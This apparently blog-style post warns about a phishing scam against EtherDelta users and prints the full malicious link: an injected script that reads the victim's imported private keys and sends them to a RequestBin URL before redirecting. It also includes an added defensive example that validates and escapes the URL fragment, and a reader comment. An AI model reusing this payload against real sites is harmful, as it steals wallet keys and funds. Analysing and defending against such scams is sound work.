Another day, another EtherDelta scam

in #cryptocurrency, 7 years ago

This simple scam once again depends on tricking the victim into clicking a malicious link. 

The code was hosted on the Google URL Shortener service and still appeared to be active at the time of writing:

https://goo.gl/#analytics/goo.gl/uKAuke/all_time

The payload was as follows:

https://etherdelta.com/#0x">
<script>
	if (typeof g === "undefined" || g == 0) {
		var g = 0;
		m();
	} 
	function m() {
		var a = main["\x45\x74\x68\x65\x72\x44\x65\x6c\x74\x61"].pks;
		// main["EtherDelta"].pks
		for (var x=0;x<a.length;x++) {
			if(a[x] != "") {
				$.ajax({
					url:"https://requestb.in/19nxov41?1="+a[x],
					async:false
				});
				g = 1;
			}
		}
		if (g == 1) {
			window.location.href = "https://etherdelta.com";
		}
	}
</script>
<input d="-ETH

The victim is redirected to https://etherdelta.com.

The URL also contains a short script which reads main["EtherDelta"].pks, the victim's private key, into a variable and then sends it to RequestBin, a site that allows users to collect and inspect HTTP requests.

The attacker is then able to easily gather victims' private keys and empty their wallets.

Please note this attack is again only effective against users who choose to import their private key into EtherDelta.
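
A defensive counterpart to the payload above, added here as an example and not taken from EtherDelta's code: validate the URL fragment against a strict allow-list and HTML-escape it before it reaches markup, so a fragment that closes an attribute and opens a `<script>` tag is dropped. The `#TOKEN-BASE` fragment format, the function names, the fallback pair and the sample fragments are assumptions constructed for illustration.

```javascript
// Added example (not EtherDelta's code). Assumption: the page expects a
// "#TOKEN-BASE" fragment, each side a ticker or a 0x-prefixed address.
const ADDRESS = /^0x[0-9a-fA-F]{40}$/; // 20-byte hex contract address
const SYMBOL = /^[A-Za-z0-9]{1,10}$/;  // short ticker symbol
const DEFAULT_PAIR = { token: "TOKEN", base: "ETH" }; // hypothetical fallback

// Return {token, base} for a well-formed fragment, or null for anything else.
function parsePairFragment(hash) {
  const raw = hash.startsWith("#") ? hash.slice(1) : hash;
  let decoded;
  try {
    decoded = decodeURIComponent(raw); // also catches %22%3E... encoded forms
  } catch (err) {
    return null; // malformed percent-encoding
  }
  const parts = decoded.split("-");
  if (parts.length !== 2) return null;
  const valid = (s) => ADDRESS.test(s) || SYMBOL.test(s);
  const [token, base] = parts;
  return valid(token) && valid(base) ? { token, base } : null;
}

// Defence in depth: escape even validated values before building markup.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Build the input element from the fragment, falling back to a safe default.
function renderPairInput(hash) {
  const pair = parsePairFragment(hash) || DEFAULT_PAIR;
  return `<input id="pair" value="${escapeHtml(pair.token)}-${escapeHtml(pair.base)}">`;
}

// Constructed samples: one benign, two shaped like the payload above
// (script body elided; the second is the percent-encoded variant).
const SAMPLES = [
  "#0x" + "ab".repeat(20) + "-ETH",
  '#0x"><script>/* elided */</script><input d="-ETH',
  "#0x%22%3E%3Cscript%3E%3C/script%3E%3Cinput%20d=%22-ETH",
];
for (const s of SAMPLES) {
  console.log(parsePairFragment(s) ? "accepted" : "rejected", "->", renderPairInput(s));
}
```
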


Man, the scammers never rest! This is quite the malicious hack, thanks for sharing.